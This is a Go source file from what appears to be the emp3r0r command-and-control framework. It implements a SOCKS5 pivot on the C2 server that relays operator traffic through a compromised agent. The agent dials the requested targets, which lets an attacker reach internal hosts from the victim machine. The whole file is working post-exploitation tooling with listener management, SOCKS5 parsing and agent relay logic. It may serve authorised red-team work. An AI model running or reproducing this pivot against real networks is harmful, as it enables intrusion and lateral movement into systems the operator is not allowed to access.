package server

// socks5.go — C2-resident SOCKS5 pivot (Cobalt Strike style, stream based).
//
// A SOCKS5 listener runs on the C2 host and accepts operator traffic (reachable
// over the WireGuard network / VPN). For every CONNECT the C2 asks the bound
// agent — over the agent's CBOR message tunnel — to dial the requested target
// and to open a dedicated C2 relay stream on the Proxy route (no HTTP upgrade
// header is involved: the instruction rides in CBOR and the dispatcher reroutes
// the stream to the proxy API). Once the agent's stream is up, the C2 acts as a
// pure relay between the operator's SOCKS5 connection and that stream, and the
// agent relays between the stream and the target.
//
// The agent dials the target BEFORE opening the stream, so stream arrival is
// the agent's implicit "CONNECT succeeded" acknowledgement; a dial failure is
// reported by the agent as a normal command error (JobID = stream token) which
// the message-tunnel handler funnels back to us via live.CmdResultsReady.

import (
	"context"
	"encoding/binary"
	"errors"
	"fmt"
	"io"
	"net"
	"net/http"
	"strconv"
	"sync"
	"time"

	"github.com/fxamacker/cbor/v2"
	"github.com/google/uuid"
	"github.com/jm33-m0/emp3r0r/core/internal/cc/base/agents"
	"github.com/jm33-m0/emp3r0r/core/internal/def"
	"github.com/jm33-m0/emp3r0r/core/internal/live"
	"github.com/jm33-m0/emp3r0r/core/lib/logging"
)

// SOCKS5 protocol reply codes (RFC 1928).
const (
	socks5RepSuccess           = 0x00
	socks5RepGeneralFailure    = 0x01
	socks5RepHostUnreachable   = 0x04
	socks5RepConnectionRefused = 0x05
	socks5RepCommandNotSupport = 0x07
	socks5RepAddrTypeNotSup    = 0x08
)

const (
	// socks5ProxyDialTimeout caps how long a CONNECT waits for the agent to
	// dial the target and open its relay stream.
	socks5ProxyDialTimeout = 30 * time.Second
	// socks5HandshakeTimeout bounds the SOCKS5 negotiation itself.
	socks5HandshakeTimeout = 15 * time.Second
)

// socks5RelayIdleTimeout tears an established relay down after this much
// silence on both legs. A client that dies without FIN (or an agent stream
// that stalls) must not pin the relay goroutine, the pending entry and the
// bookkeeping forever. Vars so tests can shorten them.
var (
	socks5RelayIdleTimeout   = 15 * time.Minute
	socks5RelayWatchInterval = 5 * time.Second
)

// socksProxyTokenPrefix marks relay tokens generated by the CC-internal SOCKS5
// pivot. It keeps their dial-failure responses (JobID = token) from being
// mistaken for orphaned operator jobs in the message-tunnel handler.
const socksProxyTokenPrefix = "socks5-"

// socks5ProxyEntry glues one operator-side SOCKS5 connection to the agent's
// C2 relay stream.
type socks5ProxyEntry struct {
	token      string
	agentUUID  string
	sock       net.Conn // operator-side connection
	stream     io.ReadWriteCloser
	streamUp   chan struct{} // closed once the agent's relay stream arrives
	streamOnce sync.Once
	done       chan struct{} // closed once the relay is fully torn down
	doneOnce   sync.Once
	closeOnce  sync.Once
}

// markStreamUp records the agent's relay stream and notifies the SOCKS5
// handler that the CONNECT can be answered.
func (e *socks5ProxyEntry) markStreamUp(stream io.ReadWriteCloser) {
	e.stream = stream
	e.streamOnce.Do(func() {
		close(e.streamUp)
	})
}

// teardown closes both legs of the relay exactly once and notifies waiters.
func (e *socks5ProxyEntry) teardown() {
	e.doneOnce.Do(func() {
		e.closeOnce.Do(func() {
			if e.sock != nil {
				_ = e.sock.Close()
			}
			if e.stream != nil {
				_ = e.stream.Close()
			}
		})
		close(e.done)
	})
}

// pendingProxyEntries maps a stream token to the waiting SOCKS5 connection.
var pendingProxyEntries sync.Map // token -> *socks5ProxyEntry

func lookupPendingProxyEntry(token string) *socks5ProxyEntry {
	v, ok := pendingProxyEntries.Load(token)
	if !ok {
		return nil
	}
	e, ok := v.(*socks5ProxyEntry)
	if !ok {
		return nil
	}
	return e
}

// clearProxyJobBookkeeping removes the token from the command/job machinery so
// a late agent error response cannot resurrect stale state.
func clearProxyJobBookkeeping(token string) {
	live.CmdTime.Delete(token)
	live.CmdResults.Delete(token)
	live.CmdResultsReady.Delete(token)
}

// ---------------------------------------------------------------------------
// Listener management
// ---------------------------------------------------------------------------

type socks5Listener struct {
	agentTag string
	agentID  string // agent UUID resolved at start; streams must match
	bindAddr string
	port     int
	owner    string // operator session that started this listener
	ln       net.Listener
	ctx      context.Context
	cancel   context.CancelFunc
	conns    sync.Map // active operator-side connections
	wg       sync.WaitGroup
}

type socks5Manager struct {
	mu        sync.Mutex
	listeners map[int]*socks5Listener
}

var socks5Proxies = &socks5Manager{listeners: make(map[int]*socks5Listener)}

// StartSocks5Proxy starts a SOCKS5 pivot listener on the C2 host (bindAddr can
// be empty to bind all interfaces, e.g. reachable via the WireGuard IP) and
// binds it to the given agent: every CONNECT is relayed through that agent.
func StartSocks5Proxy(agentTag string, port int, bindAddr string) error {
	if port <= 0 || port > 65535 {
		return fmt.Errorf("socks5: invalid port %d", port)
	}
	if agentTag == "" {
		return fmt.Errorf("socks5: empty agent tag")
	}

	socks5Proxies.mu.Lock()
	if _, exists := socks5Proxies.listeners[port]; exists {
		socks5Proxies.mu.Unlock()
		return fmt.Errorf("socks5: port %d is already used by another SOCKS5 listener", port)
	}
	socks5Proxies.mu.Unlock()

	agent := agents.GetAgentByTag(agentTag)
	if agent == nil {
		return fmt.Errorf("socks5: agent %s not found", agentTag)
	}
	if _, ctrl, _, found := agents.RuntimeControlByUUID(agent.UUID); !found || ctrl == nil || ctrl.Conn == nil {
		return fmt.Errorf("socks5: agent %s is not connected", agentTag)
	}

	if bindAddr == "" {
		bindAddr = "0.0.0.0"
	}
	ln, err := net.Listen("tcp", net.JoinHostPort(bindAddr, strconv.Itoa(port)))
	if err != nil {
		return fmt.Errorf("socks5: listen %s:%d: %w", bindAddr, port, err)
	}

	ctx, cancel := context.WithCancel(context.Background())
	ls := &socks5Listener{
		agentTag: agentTag,
		agentID:  agent.UUID,
		bindAddr: bindAddr,
		port:     port,
		ln:       ln,
		ctx:      ctx,
		cancel:   cancel,
	}

	socks5Proxies.mu.Lock()
	if _, exists := socks5Proxies.listeners[port]; exists {
		socks5Proxies.mu.Unlock()
		cancel()
		_ = ln.Close()
		return fmt.Errorf("socks5: port %d is already used by another SOCKS5 listener", port)
	}
	socks5Proxies.listeners[port] = ls
	socks5Proxies.mu.Unlock()

	logging.Infof("SOCKS5 pivot started on %s:%d (relaying through agent %s)", bindAddr, port, agentTag)
	ls.wg.Add(1)
	go ls.acceptLoop()
	return nil
}

// StopSocks5Proxy stops a running SOCKS5 pivot listener and its live relays.
func StopSocks5Proxy(port int) error {
	socks5Proxies.mu.Lock()
	ls, ok := socks5Proxies.listeners[port]
	if ok {
		delete(socks5Proxies.listeners, port)
	}
	socks5Proxies.mu.Unlock()
	if !ok || ls == nil {
		return fmt.Errorf("socks5: no listener on port %d", port)
	}

	logging.Infof("SOCKS5 pivot on port %d stopped", port)
	ls.cancel()
	_ = ls.ln.Close()
	ls.conns.Range(func(key, _ any) bool {
		if c, ok := key.(net.Conn); ok {
			_ = c.Close()
		}
		return true
	})
	ls.wg.Wait()
	return nil
}

// StopAllSocks5Proxies tears every SOCKS5 pivot down (e.g. server shutdown).
func StopAllSocks5Proxies() {
	socks5Proxies.mu.Lock()
	ports := make([]int, 0, len(socks5Proxies.listeners))
	for p := range socks5Proxies.listeners {
		ports = append(ports, p)
	}
	socks5Proxies.mu.Unlock()
	for _, p := range ports {
		_ = StopSocks5Proxy(p)
	}
}

// ListSocks5Proxies returns the currently running C2-side SOCKS5 pivots.
func ListSocks5Proxies() []def.Socks5ProxyStatus {
	socks5Proxies.mu.Lock()
	defer socks5Proxies.mu.Unlock()
	out := make([]def.Socks5ProxyStatus, 0, len(socks5Proxies.listeners))
	for port, ls := range socks5Proxies.listeners {
		out = append(out, def.Socks5ProxyStatus{
			Port:     port,
			AgentTag: ls.agentTag,
			BindAddr: ls.bindAddr,
		})
	}
	return out
}

// StopSocks5ProxiesForOperator stops every SOCKS5 pivot started by the given
// operator session. Called when that operator disconnects.
func StopSocks5ProxiesForOperator(session string) {
	if session == "" {
		return
	}
	socks5Proxies.mu.Lock()
	ports := make([]int, 0)
	for p, ls := range socks5Proxies.listeners {
		if ls.owner == session {
			ports = append(ports, p)
		}
	}
	socks5Proxies.mu.Unlock()
	for _, p := range ports {
		logging.Infof("SOCKS5 pivot on port %d owned by operator %s is being stopped", p, session)
		_ = StopSocks5Proxy(p)
	}
}

func (ls *socks5Listener) acceptLoop() {
	defer ls.wg.Done()
	for {
		conn, err := ls.ln.Accept()
		if err != nil {
			if ls.ctx.Err() != nil || errors.Is(err, net.ErrClosed) {
				return
			}
			logging.Warningf("socks5 accept on port %d: %v", ls.port, err)
			continue
		}
		ls.conns.Store(conn, struct{}{})
		ls.wg.Add(1)
		go func() {
			defer ls.wg.Done()
			defer ls.conns.Delete(conn)
			ls.handleOperatorConn(conn)
		}()
	}
}

// handleOperatorConn performs the SOCKS5 negotiation for one operator
// connection and then drives the relay setup.
func (ls *socks5Listener) handleOperatorConn(conn net.Conn) {
	defer conn.Close()

	_ = conn.SetDeadline(time.Now().Add(socks5HandshakeTimeout))
	methods, err := readSocks5Greeting(conn)
	if err != nil {
		logging.Debugf("socks5 handshake from %s failed: %v", conn.RemoteAddr(), err)
		return
	}
	if !socks5SupportsNoAuth(methods) {
		_, _ = conn.Write([]byte{0x05, 0xff}) // no acceptable methods
		return
	}
	if _, err = conn.Write([]byte{0x05, 0x00}); err != nil { // no auth
		return
	}

	cmd, target, err := readSocks5Request(conn)
	if err != nil {
		logging.Debugf("socks5 request from %s failed: %v", conn.RemoteAddr(), err)
		_ = socks5Reply(conn, socks5RepGeneralFailure)
		return
	}
	if cmd != 0x01 { // only CONNECT is supported
		logging.Warningf("socks5: unsupported command 0x%02x from %s", cmd, conn.RemoteAddr())
		_ = socks5Reply(conn, socks5RepCommandNotSupport)
		return
	}

	// Handshake done — the relay may idle for a long time.
	_ = conn.SetDeadline(time.Time{})
	if err := ls.proxyToAgent(conn, target); err != nil {
		logging.Debugf("socks5: %v", err)
	}
}

// proxyToAgent orders the bound agent to dial target and open its relay stream,
// then hands the operator connection over to the relay once the stream arrives.
func (ls *socks5Listener) proxyToAgent(sock net.Conn, target string) error {
	agent := agents.GetAgentByTag(ls.agentTag)
	if agent == nil {
		return fmt.Errorf("socks5: agent %s is gone", ls.agentTag)
	}

	token := socksProxyTokenPrefix + uuid.NewString()
	// Every CONNECT the listener accepts is logged here — if tun2socks traffic
	// never produces this line, the request is not reaching this listener at all.
	logging.Infof("SOCKS5 CONNECT %s from %s via agent %s (token %s)", target, sock.RemoteAddr(), ls.agentTag, token)
	entry := &socks5ProxyEntry{
		token:     token,
		agentUUID: agent.UUID,
		sock:      sock,
		streamUp:  make(chan struct{}),
		done:      make(chan struct{}),
	}
	pendingProxyEntries.Store(token, entry)
	defer pendingProxyEntries.Delete(token)

	// Register the token with the job machinery so a dial-failure reported by
	// the agent (JobID = token) wakes us up via CmdResultsReady.
	live.CmdTime.Store(token, time.Now().Format("2006-01-02 15:04:05.999999999 -0700 MST"))
	resultCh := make(chan struct{})
	live.CmdResultsReady.Store(token, resultCh)

	cmdLine := fmt.Sprintf("%s --token %s --target %s", def.C2CmdProxyStart, token, target)
	if err := agents.SendCmd(cmdLine, token, agent); err != nil {
		clearProxyJobBookkeeping(token)
		// Fail the operator's SOCKS5 CONNECT fast (agent offline/dead) instead
		// of letting the client hang until its own timeout.
		_ = socks5Reply(sock, socks5RepConnectionRefused)
		entry.teardown()
		return fmt.Errorf("socks5: instruct agent %s: %w", ls.agentTag, err)
	}

	select {
	case <-entry.streamUp:
		// The agent's relay stream is up (its dial succeeded). handleProxyRelayStream
		// answers the SOCKS5 CONNECT and relays; we just keep the conn alive here.
		<-entry.done
		return nil

	case <-resultCh:
		errAny, _ := live.CmdResults.LoadAndDelete(token)
		clearProxyJobBookkeeping(token)
		_ = socks5Reply(sock, socks5RepConnectionRefused)
		entry.teardown()
		errMsg, _ := errAny.(string)
		return fmt.Errorf("socks5: agent %s could not reach %s: %s", ls.agentTag, target, errMsg)

	case <-time.After(socks5ProxyDialTimeout):
		clearProxyJobBookkeeping(token)
		_ = socks5Reply(sock, socks5RepHostUnreachable)
		entry.teardown()
		return fmt.Errorf("socks5: timed out waiting for agent %s to open relay to %s", ls.agentTag, target)

	case <-ls.ctx.Done():
		clearProxyJobBookkeeping(token)
		entry.teardown()
		return fmt.Errorf("socks5: listener on port %d stopped", ls.port)
	}
}

// ---------------------------------------------------------------------------
// Minimal SOCKS5 wire protocol
// ---------------------------------------------------------------------------

func readSocks5Greeting(conn net.Conn) ([]byte, error) {
	hdr := make([]byte, 2)
	if _, err := io.ReadFull(conn, hdr); err != nil {
		return nil, err
	}
	if hdr[0] != 0x05 {
		return nil, fmt.Errorf("not a SOCKS5 greeting (ver 0x%02x)", hdr[0])
	}
	methods := make([]byte, int(hdr[1]))
	if _, err := io.ReadFull(conn, methods); err != nil {
		return nil, err
	}
	return methods, nil
}

func socks5SupportsNoAuth(methods []byte) bool {
	for _, m := range methods {
		if m == 0x00 {
			return true
		}
	}
	return false
}

// readSocks5Request parses a SOCKS5 CONNECT-style request and returns the
// command byte and the destination as "host:port".
func readSocks5Request(conn net.Conn) (cmd byte, target string, err error) {
	hdr := make([]byte, 4)
	if _, err = io.ReadFull(conn, hdr); err != nil {
		return 0, "", err
	}
	if hdr[0] != 0x05 {
		return 0, "", fmt.Errorf("bad SOCKS5 version 0x%02x in request", hdr[0])
	}
	cmd = hdr[1]
	atyp := hdr[3]

	var host string
	switch atyp {
	case 0x01: // IPv4
		raw := make([]byte, 4)
		if _, err = io.ReadFull(conn, raw); err != nil {
			return 0, "", err
		}
		host = net.IP(raw).String()
	case 0x04: // IPv6
		raw := make([]byte, 16)
		if _, err = io.ReadFull(conn, raw); err != nil {
			return 0, "", err
		}
		host = net.IP(raw).String()
	case 0x03: // domain name
		lenBuf := make([]byte, 1)
		if _, err = io.ReadFull(conn, lenBuf); err != nil {
			return 0, "", err
		}
		n := int(lenBuf[0])
		if n == 0 || n > 255 {
			return 0, "", fmt.Errorf("invalid domain length %d", n)
		}
		name := make([]byte, n)
		if _, err = io.ReadFull(conn, name); err != nil {
			return 0, "", err
		}
		host = string(name)
	default:
		return 0, "", fmt.Errorf("unsupported address type 0x%02x", atyp)
	}

	portBuf := make([]byte, 2)
	if _, err = io.ReadFull(conn, portBuf); err != nil {
		return 0, "", err
	}
	port := binary.BigEndian.Uint16(portBuf)
	if port == 0 {
		return 0, "", fmt.Errorf("invalid destination port 0")
	}
	return cmd, net.JoinHostPort(host, strconv.Itoa(int(port))), nil
}

// socks5Reply writes a CONNECT reply with the given rep code.
func socks5Reply(conn net.Conn, rep byte) error {
	// VER REP RSV ATYP(IPv4) BND.ADDR(0.0.0.0) BND.PORT(0)
	reply := []byte{0x05, rep, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}
	_, err := conn.Write(reply)
	return err
}

// ---------------------------------------------------------------------------
// Operator API handlers
// ---------------------------------------------------------------------------

// handleSocks5Start starts a SOCKS5 pivot listener on the C2 host bound to the
// requested agent. Invoked by the operator console via the mTLS operator API.
func handleSocks5Start(wrt http.ResponseWriter, req *http.Request) {
	defer func() {
		if r := recover(); r != nil {
			logging.Errorf("handleSocks5Start panicked: %v", r)
			http.Error(wrt, "Internal server error", http.StatusInternalServerError)
		}
	}()
	payload, err := DecodeCBORBody[def.Socks5ProxyRequest](wrt, req)
	if err != nil {
		return
	}
	if payload.Port <= 0 || payload.Port > 65535 {
		http.Error(wrt, "Invalid port", http.StatusBadRequest)
		return
	}
	if err := StartSocks5Proxy(payload.AgentTag, payload.Port, payload.BindAddr); err != nil {
		logging.Errorf("handleSocks5Start: %v", err)
		http.Error(wrt, err.Error(), http.StatusBadRequest)
		return
	}
	// Track ownership so the listener dies with its operator session.
	if owner, err := operatorSessionFromReq(req); err == nil {
		socks5Proxies.mu.Lock()
		if ls, ok := socks5Proxies.listeners[payload.Port]; ok {
			ls.owner = owner
		}
		socks5Proxies.mu.Unlock()
	}
	logging.Successf("SOCKS5 pivot started on port %d via agent %s", payload.Port, payload.AgentTag)
	wrt.WriteHeader(http.StatusOK)
}

// handleSocks5List returns the running SOCKS5 pivots to the operator console.
func handleSocks5List(wrt http.ResponseWriter, _ *http.Request) {
	defer func() {
		if r := recover(); r != nil {
			logging.Errorf("handleSocks5List panicked: %v", r)
			http.Error(wrt, "Internal server error", http.StatusInternalServerError)
		}
	}()
	wrt.Header().Set("Content-Type", "application/cbor")
	if err := cbor.NewEncoder(wrt).Encode(ListSocks5Proxies()); err != nil {
		http.Error(wrt, err.Error(), http.StatusInternalServerError)
	}
}

// handleSocks5Stop stops a running SOCKS5 pivot listener.
func handleSocks5Stop(wrt http.ResponseWriter, req *http.Request) {
	defer func() {
		if r := recover(); r != nil {
			logging.Errorf("handleSocks5Stop panicked: %v", r)
			http.Error(wrt, "Internal server error", http.StatusInternalServerError)
		}
	}()
	payload, err := DecodeCBORBody[def.Socks5ProxyRequest](wrt, req)
	if err != nil {
		return
	}
	if err := StopSocks5Proxy(payload.Port); err != nil {
		http.Error(wrt, err.Error(), http.StatusBadRequest)
		return
	}
	wrt.WriteHeader(http.StatusOK)
}
